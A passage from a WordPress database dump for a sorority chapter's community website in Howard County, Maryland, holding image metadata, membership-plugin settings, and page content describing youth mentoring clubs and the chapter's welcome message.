84268523931\";a:4:{s:4:\"file\";s:35:\"IMG_0839-e1484190921258-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"shop_catalog-1484268523931\";a:4:{s:4:\"file\";s:35:\"IMG_0839-e1484190921258-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"shop_single-1484268523931\";a:4:{s:4:\"file\";s:35:\"IMG_0839-e1484190921258-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}}'),(3480,873,'_wp_attached_file','2017/01/SorLawson_HS-e1484269781256.jpg'),(3481,873,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1243;s:6:\"height\";i:1324;s:4:\"file\";s:39:\"2017/01/SorLawson_HS-e1484269781256.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"SorLawson_HS-e1484269781256-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"SorLawson_HS-e1484269781256-282x300.jpg\";s:5:\"width\";i:282;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:39:\"SorLawson_HS-e1484269781256-768x818.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:818;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:40:\"SorLawson_HS-e1484269781256-961x1024.jpg\";s:5:\"width\";i:961;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:39:\"SorLawson_HS-e1484269781256-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:39:\"SorLawson_HS-e1484269781256-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:39:\"SorLawson_HS-e1484269781256-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:39:\"SorLawson_HS-e1484269781256-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:39:\"SorLawson_HS-e1484269781256-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:39:\"SorLawson_HS-e1484269781256-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:39:\"SorLawson_HS-e1484269781256-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:0:\"\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(3508,879,'_wp_attached_file','2017/01/IMG_0842-e1484269600518.jpg'),(3509,879,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3421;s:6:\"height\";i:3978;s:4:\"file\";s:35:\"2017/01/IMG_0842-e1484269600518.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"IMG_0842-e1484269600518-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"IMG_0842-e1484269600518-258x300.jpg\";s:5:\"width\";i:258;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"IMG_0842-e1484269600518-768x893.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:893;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"IMG_0842-e1484269600518-881x1024.jpg\";s:5:\"width\";i:881;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:35:\"IMG_0842-e1484269600518-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:35:\"IMG_0842-e1484269600518-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:35:\"IMG_0842-e1484269600518-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:35:\"IMG_0842-e1484269600518-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"IMG_0842-e1484269600518-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:35:\"IMG_0842-e1484269600518-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:35:\"IMG_0842-e1484269600518-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:19:\"Canon EOS REBEL T3i\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1476644974\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"39\";s:3:\"iso\";s:4:\"1600\";s:13:\"shutter_speed\";s:17:\"0.016666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"8\";s:8:\"keywords\";a:0:{}}}'),(2154,543,'_um_login_custom_css',''),(2153,543,'_um_login_redirect_url',''),(2152,543,'_um_login_after_login','0'),(2151,543,'_um_login_show_rememberme','1'),(2150,543,'_um_login_forgot_pass_link','1'),(2149,543,'_um_login_secondary_btn_text','#666666'),(2148,543,'_um_login_secondary_btn_hover','#e5e5e5'),(2147,543,'_um_login_secondary_btn_color','#eeeeee'),(3036,738,'ts_use_template','1'),(3037,738,'_edit_lock','1594331602:1'),(3038,738,'_edit_last','1'),(3039,738,'ts_template','a:1:{i:0;a:2:{s:8:\"settings\";a:26:{s:7:\"rowName\";s:0:\"\";s:7:\"bgColor\";s:11:\"transparent\";s:9:\"textColor\";s:7:\"inherit\";s:12:\"rowMaskColor\";s:7:\"inherit\";s:7:\"rowMask\";s:2:\"no\";s:9:\"rowShadow\";s:2:\"no\";s:11:\"textOpacity\";s:0:\"\";s:7:\"bgImage\";s:0:\"\";s:9:\"bgVideoMp\";s:0:\"\";s:11:\"bgVideoWebm\";s:0:\"\";s:10:\"bgPosition\";s:4:\"auto\";s:13:\"bgAttachement\";s:0:\"\";s:8:\"bgRepeat\";s:9:\"no-repeat\";s:6:\"bgSize\";s:4:\"auto\";s:12:\"rowMarginTop\";s:1:\"0\";s:15:\"rowMarginBottom\";s:1:\"0\";s:13:\"rowPaddingTop\";s:1:\"0\";s:16:\"rowPaddingBottom\";s:1:\"0\";s:9:\"expandRow\";s:2:\"no\";s:14:\"specialEffects\";s:4:\"none\";s:12:\"rowTextAlign\";s:4:\"auto\";s:13:\"fullscreenRow\";s:2:\"no\";s:16:\"rowVerticalAlign\";s:3:\"top\";s:16:\"scrollDownButton\";s:2:\"no\";s:9:\"customCss\";s:0:\"\";s:10:\"rowOpacity\";i:0;}s:7:\"columns\";a:3:{i:0;a:2:{s:4:\"size\";i:2;s:8:\"elements\";a:1:{i:0;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:20;s:11:\"admin-label\";s:0:\"\";}}}i:1;a:2:{s:4:\"size\";i:8;s:8:\"elements\";a:5:{i:0;a:7:{s:4:\"type\";s:5:\"image\";s:9:\"image-url\";s:67:\"https://zphiblgz.org/wp-content/uploads/2020/07/all-youth-logos.png\";s:11:\"forward-url\";s:44:\"https://zphiblgz.org/event/youth-open-house/\";s:12:\"image-target\";s:6:\"_blank\";s:11:\"admin-label\";s:11:\"youth logos\";s:6:\"retina\";s:1:\"y\";s:5:\"align\";s:6:\"center\";}i:1;a:9:{s:4:\"type\";s:5:\"title\";s:10:\"title-icon\";s:11:\"icon-noicon\";s:5:\"title\";s:55:\"Pearlette, Amicette, & Archonette Youth Auxiliary Clubs\";s:11:\"title-color\";s:7:\"#2741a6\";s:8:\"subtitle\";s:0:\"\";s:14:\"subtitle-color\";s:7:\"#3f4549\";s:5:\"style\";s:8:\"linerect\";s:4:\"size\";s:2:\"h1\";s:11:\"admin-label\";s:0:\"\";}i:2;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:30;s:11:\"admin-label\";s:0:\"\";}i:3;a:3:{s:4:\"type\";s:4:\"text\";s:4:\"text\";s:1804:\"<p>Lambda Gamma Zeta is dedicated to serving the youth of Howard County, Maryland.  As a partner with the Howard County Public School System, our chapter has expanded our service to the youth in the community by offering the Zeta Phi Beta Sorority, Inc. <strong>Pearlette, </strong><span style=--quote--color: #000000;--quote--><strong>Amicette, & Archonette Youth Auxiliary Clubs.</strong></span></p><h4><span style=--quote--color: #5eb0e5;--quote-->Pearlette Club</span></h4><p>Pearlettes are girls ages 4-8 years old who are mentored by ladies of Zeta Phi Beta Sorority, Inc. to become outstanding leaders in their community. The purpose of the Pearlette program is to teach young girls the importance of serving their community, developing high academics and personal standards.</p><h4><span style=--quote--color: #2041a5;--quote-->Amicette Club</span></h4><p>Amicettes are young ladies aged 9-13. The focus of the program is to mentor young ladies and assist in their cultural, social, and educational growth. These young ladies demonstrate an interest in the goals and the ideals of scholarship, sisterly love, and community service.</p><h4><span style=--quote--color: #000080;--quote-->Archonette Club</span></h4><p>Archonettes are comprised of high school girls ages 14 to 17. Members are mentored by Zetas.  They also engage in a variety of educational, service, and leadership activities to prepare them for college and adulthood.</p><p><strong>Information & Application Request<br /></strong>Any young lady with a desire for mentorship and commitment to leadership and community service should contact LGZ for more information by completing the form. <strong><br /></strong></p><p>[gravityform id=--quote--7--quote-- title=--quote--false--quote-- description=--quote--false--quote--]</p>\";s:11:\"admin-label\";s:17:\"club descriptions\";}i:4;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:20;s:11:\"admin-label\";s:0:\"\";}}}i:2;a:2:{s:4:\"size\";i:2;s:8:\"elements\";a:1:{i:0;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:20;s:11:\"admin-label\";s:0:\"\";}}}}}}'),(3848,738,'_yoast_wpseo_content_score','30'),(3040,738,'ts_sidebar','a:3:{s:8:\"position\";s:4:\"none\";s:4:\"size\";s:3:\"1-3\";s:2:\"id\";i:0;}'),(3041,738,'ts_header_and_footer','a:3:{s:14:\"disable_header\";i:0;s:14:\"disable_footer\";i:0;s:11:\"breadcrumbs\";i:0;}'),(3042,738,'page_settings','a:5:{s:10:\"hide_title\";s:2:\"no\";s:9:\"hide_meta\";s:2:\"no\";s:19:\"hide_social_sharing\";s:2:\"no\";s:12:\"hide_featimg\";s:2:\"no\";s:15:\"hide_author_box\";s:2:\"no\";}'),(3043,738,'post_settings',NULL),(3035,737,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:490;s:6:\"height\";i:300;s:4:\"file\";s:23:\"2014/12/hcpsslogo-1.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"hcpsslogo-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"hcpsslogo-1-300x184.png\";s:5:\"width\";i:300;s:6:\"height\";i:184;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:23:\"hcpsslogo-1-400x300.png\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:23:\"hcpsslogo-1-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:23:\"hcpsslogo-1-490x300.png\";s:5:\"width\";i:490;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:23:\"hcpsslogo-1-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"hcpsslogo-1-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:23:\"hcpsslogo-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3034,737,'_wp_attached_file','2014/12/hcpsslogo-1.png'),(224,90,'_edit_last','1'),(225,90,'ts_template','a:0:{}'),(226,90,'cause','a:7:{s:10:\"date-start\";i:1492473600;s:8:\"date-end\";i:1494115200;s:9:\"paypal-id\";s:19:\"paypal@zphiblgz.org\";s:13:\"currency-code\";s:3:\"USD\";s:15:\"funded-till-now\";s:3:\"300\";s:5:\"total\";s:3:\"700\";s:6:\"custom\";s:0:\"\";}'),(4113,90,'_wp_old_slug','bring-water-children'),(4114,1051,'_wp_attached_file','2014/12/MODCOVER.png'),(4115,1051,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2000;s:6:\"height\";i:1000;s:4:\"file\";s:20:\"2014/12/MODCOVER.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"MODCOVER-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"MODCOVER-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"MODCOVER-768x384.png\";s:5:\"width\";i:768;s:6:\"height\";i:384;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"MODCOVER-1024x512.png\";s:5:\"width\";i:1024;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"MODCOVER-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:20:\"MODCOVER-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:20:\"MODCOVER-680x300.png\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:20:\"MODCOVER-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(227,90,'ts_article_views','2981'),(228,90,'_touchsize_likes','0'),(230,90,'_dp_original','88'),(2146,543,'_um_login_secondary_btn_word','Register'),(2145,543,'_um_login_secondary_btn','1'),(2144,543,'_um_login_primary_btn_text','#ffffff'),(2143,543,'_um_login_primary_btn_hover','#44b0ec'),(2142,543,'_um_login_primary_btn_color','#3ba1da'),(2141,543,'_um_login_primary_btn_word','Login'),(2140,543,'_um_login_icons','label'),(2139,543,'_um_login_align','center'),(2138,543,'_um_login_max_width','450px'),(2137,543,'_um_login_template','login'),(2136,543,'_um_login_use_globals','1'),(2135,543,'_um_profile_custom_css',''),(2155,543,'_um_profile_metafields','a:1:{i:0;s:1:\"0\";}'),(2133,543,'_um_profile_show_bio','1'),(2132,543,'_um_profile_show_social_links','0'),(2131,543,'_um_profile_show_name','1'),(2130,543,'_um_profile_header_icon_hcolor','#3ba1da'),(2129,543,'_um_profile_header_icon_color','#aaaaaa'),(2128,543,'_um_profile_header_link_hcolor','#444444'),(2127,543,'_um_profile_header_link_color','#555555'),(2126,543,'_um_profile_header_text','#999999'),(2125,543,'_um_profile_header_bg','0'),(2124,543,'_um_profile_photo_required','0'),(2123,543,'_um_profile_photocorner','1'),(2122,543,'_um_profile_photosize','190px'),(2121,543,'_um_profile_cover_ratio','2.7:1'),(2120,543,'_um_profile_cover_enabled','1'),(2119,543,'_um_profile_main_bg','0'),(2118,543,'_um_profile_secondary_btn_text','#666666'),(2085,543,'_edit_lock','1480702262:1'),(2084,546,'_edit_lock','1480702002:1'),(2083,563,'_um_delete_redirect_url',''),(2082,563,'_um_after_delete','redirect_home'),(2081,563,'_um_logout_redirect_url',''),(2080,563,'_um_after_logout','redirect_home'),(2079,563,'_um_login_redirect_url','www.development.zphiblgz.org/members-only'),(2078,563,'_um_after_login','redirect_url'),(2077,563,'_um_pending_url',''),(2076,563,'_um_pending_message','Thank you. '),(2075,563,'_um_pending_action','show_message'),(2074,563,'_um_url_email_activate',''),(2073,563,'_um_checkmail_url',''),(2072,563,'_um_checkmail_message','Thank you for registering. Before you can login we need you to activate your account by clicking the activation link in the email we just sent you.'),(2071,563,'_um_checkmail_action','show_message'),(2070,563,'_um_login_email_activate','0'),(2069,563,'_um_auto_approve_url',''),(2068,563,'_um_auto_approve_act','redirect_profile'),(2067,563,'_um_status','pending'),(2066,563,'_um_redirect_homepage',''),(2065,563,'_um_default_homepage','1'),(2064,563,'_um_can_access_private_profile','0'),(2063,563,'_um_can_make_private_profile','0'),(320,6,'ts_use_template','1'),(321,6,'_edit_last','1'),(322,6,'ts_template','a:3:{i:0;a:2:{s:8:\"settings\";a:26:{s:7:\"rowName\";s:0:\"\";s:7:\"bgColor\";s:11:\"transparent\";s:9:\"textColor\";s:7:\"inherit\";s:12:\"rowMaskColor\";s:7:\"inherit\";s:7:\"rowMask\";s:2:\"no\";s:9:\"rowShadow\";s:2:\"no\";s:11:\"textOpacity\";s:0:\"\";s:7:\"bgImage\";s:0:\"\";s:9:\"bgVideoMp\";s:0:\"\";s:11:\"bgVideoWebm\";s:0:\"\";s:10:\"bgPosition\";s:4:\"left\";s:13:\"bgAttachement\";s:5:\"fixed\";s:8:\"bgRepeat\";s:6:\"repeat\";s:6:\"bgSize\";s:4:\"auto\";s:12:\"rowMarginTop\";s:3:\"-60\";s:15:\"rowMarginBottom\";s:2:\"70\";s:13:\"rowPaddingTop\";s:1:\"0\";s:16:\"rowPaddingBottom\";s:1:\"0\";s:9:\"expandRow\";s:3:\"yes\";s:14:\"specialEffects\";s:4:\"none\";s:12:\"rowTextAlign\";s:4:\"auto\";s:13:\"fullscreenRow\";s:2:\"no\";s:16:\"rowVerticalAlign\";s:3:\"top\";s:16:\"scrollDownButton\";s:2:\"no\";s:9:\"customCss\";s:0:\"\";s:10:\"rowOpacity\";i:0;}s:7:\"columns\";a:1:{i:0;a:2:{s:4:\"size\";i:12;s:8:\"elements\";a:2:{i:0;a:7:{s:4:\"type\";s:5:\"image\";s:9:\"image-url\";s:81:\"https://zphiblgz.org/wp-content/uploads/2017/09/ZPB_Unified_Visual_Identi-266.jpg\";s:11:\"forward-url\";s:0:\"\";s:12:\"image-target\";s:6:\"_blank\";s:11:\"admin-label\";s:0:\"\";s:6:\"retina\";s:1:\"y\";s:5:\"align\";s:6:\"center\";}i:1;a:9:{s:4:\"type\";s:5:\"title\";s:10:\"title-icon\";s:11:\"icon-noicon\";s:5:\"title\";s:25:\"Lambda Gamma Zeta Chapter\";s:11:\"title-color\";s:7:\"#2041a5\";s:8:\"subtitle\";s:17:\"Howard County, MD\";s:14:\"subtitle-color\";s:7:\"#2041a5\";s:5:\"style\";s:6:\"2lines\";s:4:\"size\";s:2:\"h4\";s:11:\"admin-label\";s:0:\"\";}}}}}i:1;a:2:{s:8:\"settings\";a:26:{s:7:\"rowName\";s:0:\"\";s:7:\"bgColor\";s:11:\"transparent\";s:9:\"textColor\";s:7:\"inherit\";s:12:\"rowMaskColor\";s:7:\"inherit\";s:7:\"rowMask\";s:2:\"no\";s:9:\"rowShadow\";s:2:\"no\";s:11:\"textOpacity\";s:0:\"\";s:7:\"bgImage\";s:0:\"\";s:9:\"bgVideoMp\";s:0:\"\";s:11:\"bgVideoWebm\";s:0:\"\";s:10:\"bgPosition\";s:4:\"auto\";s:13:\"bgAttachement\";s:0:\"\";s:8:\"bgRepeat\";s:9:\"no-repeat\";s:6:\"bgSize\";s:4:\"auto\";s:12:\"rowMarginTop\";s:1:\"0\";s:15:\"rowMarginBottom\";s:1:\"0\";s:13:\"rowPaddingTop\";s:1:\"0\";s:16:\"rowPaddingBottom\";s:1:\"0\";s:9:\"expandRow\";s:2:\"no\";s:14:\"specialEffects\";s:4:\"none\";s:12:\"rowTextAlign\";s:4:\"auto\";s:13:\"fullscreenRow\";s:2:\"no\";s:16:\"rowVerticalAlign\";s:3:\"top\";s:16:\"scrollDownButton\";s:2:\"no\";s:9:\"customCss\";s:0:\"\";s:10:\"rowOpacity\";i:0;}s:7:\"columns\";a:1:{i:0;a:2:{s:4:\"size\";i:12;s:8:\"elements\";a:4:{i:0;a:3:{s:4:\"type\";s:6:\"slider\";s:9:\"slider-id\";i:567;s:11:\"admin-label\";s:0:\"\";}i:1;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:20;s:11:\"admin-label\";s:0:\"\";}i:2;a:6:{s:4:\"type\";s:14:\"features-block\";s:14:\"features-block\";s:1088:\"[{\"id\":\"1418893151521\",\"icon\":\"icon-graduate\",\"title\":\"Scholarship \",\"text\":\"We encourage the highest standards of scholastic achievement to foster a greater sense of unity within our Sorority and the community. \",\"url\":\"\",\"background\":\"#2741a6\",\"font\":\"#ffffff\"},{\"id\":\"1418893243854\",\"icon\":\"icon-social\",\"title\":\"Service \",\"text\":\"Our founding principle of service is at the heart of what all Zeta’s strive for – being a friend to man. Our national initiative Z-HOPE helps ensure that we support those in need.\",\"url\":\"\",\"background\":\"#2741a6\",\"font\":\"#ffffff\"},{\"id\":\"1418893259179\",\"icon\":\"icon-heart\",\"title\":\"Sisterhood \",\"text\":\"Zeta fosters a bond, like no other. Our support for one another is the foundation of our organization. \",\"url\":\"\",\"background\":\"#2741a6\",\"font\":\"#ffffff\"},{\"id\":\"1418910538758\",\"icon\":\"icon-team\",\"title\":\"Finer Womanhood \",\"text\":\"Our most unique principle of finer womanhood defines the image we choose to project and the manner in which we conduct ourselves – we are the definition of FINER.\",\"url\":\"\",\"background\":\"#2741a6\",\"font\":\"#ffffff\"}]\";s:16:\"elements-per-row\";s:1:\"4\";s:5:\"style\";s:6:\"style2\";s:11:\"admin-label\";s:0:\"\";s:6:\"gutter\";s:6:\"gutter\";}i:3;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:20;s:11:\"admin-label\";s:0:\"\";}}}}}i:2;a:2:{s:8:\"settings\";a:26:{s:7:\"rowName\";s:0:\"\";s:7:\"bgColor\";s:11:\"transparent\";s:9:\"textColor\";s:7:\"inherit\";s:12:\"rowMaskColor\";s:7:\"inherit\";s:7:\"rowMask\";s:2:\"no\";s:9:\"rowShadow\";s:2:\"no\";s:11:\"textOpacity\";s:0:\"\";s:7:\"bgImage\";s:0:\"\";s:9:\"bgVideoMp\";s:0:\"\";s:11:\"bgVideoWebm\";s:0:\"\";s:10:\"bgPosition\";s:4:\"left\";s:13:\"bgAttachement\";s:5:\"fixed\";s:8:\"bgRepeat\";s:9:\"no-repeat\";s:6:\"bgSize\";s:4:\"auto\";s:12:\"rowMarginTop\";s:1:\"0\";s:15:\"rowMarginBottom\";s:2:\"40\";s:13:\"rowPaddingTop\";s:1:\"0\";s:16:\"rowPaddingBottom\";s:1:\"0\";s:9:\"expandRow\";s:2:\"no\";s:14:\"specialEffects\";s:4:\"none\";s:12:\"rowTextAlign\";s:4:\"auto\";s:13:\"fullscreenRow\";s:2:\"no\";s:16:\"rowVerticalAlign\";s:3:\"top\";s:16:\"scrollDownButton\";s:2:\"no\";s:9:\"customCss\";s:0:\"\";s:10:\"rowOpacity\";i:0;}s:7:\"columns\";a:5:{i:0;a:2:{s:4:\"size\";i:8;s:8:\"elements\";a:6:{i:0;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:40;s:11:\"admin-label\";s:0:\"\";}i:1;a:9:{s:4:\"type\";s:5:\"title\";s:10:\"title-icon\";s:11:\"icon-noicon\";s:5:\"title\";s:20:\"President\'s Welcome \";s:11:\"title-color\";s:7:\"#3f4549\";s:8:\"subtitle\";s:0:\"\";s:14:\"subtitle-color\";s:7:\"#2741a6\";s:5:\"style\";s:10:\"simpleleft\";s:4:\"size\";s:2:\"h4\";s:11:\"admin-label\";s:0:\"\";}i:2;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:15;s:11:\"admin-label\";s:0:\"\";}i:3;a:3:{s:4:\"type\";s:4:\"text\";s:4:\"text\";s:1998:\"<p>On<strong> September 29, 1981,</strong> the Lambda Gamma Zeta Chapter of Zeta Phi Beta Sorority, Incorporated began her service to the Howard County, Maryland community!!!!! </p><p>For 40 years, the distinguished ladies of LGZ have been diligent in representing the founding principles of our beloved sorority - Scholarship, Service, Sisterhood, and Finer Womanhood.</p><p>As we continue to evolve and adapt to meet the challenges this pandemic has brought us, we invite all community members and partners to explore our National Service Program <a href=--quote--https://zphib1920.org/national-programs/z-hope/--quote--><strong>Z-HOPE®</strong></a> (Zetas Helping Other People Excel) and to join us in our various initiatives locally within Howard County. </p><p>We also welcome our rising Howard County high school seniors and continuing students at Howard Community College to explore our W. Ruth Conway Scholarship and educational programs as they further their studies.   </p><p>Lambda Gamma Zeta not only offers <a href=--quote--https://zphiblgz.org/sorority-membership/--quote-->membership</a> opportunities for college educated women, but leadership, growth, and mentoring opportunities for girls ages 4 to 18 through our <a href=--quote--https://zphiblgz.org/youth/--quote-->youth auxiliary groups</a>. </p><p>For Sorors looking to connect with a chapter, please complete the form <a href=--quote--https://zphiblgz.org/sorority-membership/--quote-->here</a>.  </p><p>It is my honor as the 12<sup>th</sup> President of the Lambda Gamma Zeta Chapter to welcome you to our website! </p><p><a href=--quote--https://zphiblgz.org/wp-content/uploads/2021/09/lilletsig-e1632320769724.png--quote--><img class=--quote--alignnone size-medium wp-image-1453--quote-- src=--quote--https://zphiblgz.org/wp-content/uploads/2021/09/lilletsig-e1632320769724-300x68.png--quote-- alt=--quote----quote-- width=--quote--300--quote-- height=--quote--68--quote-- /></a></p><p>President, 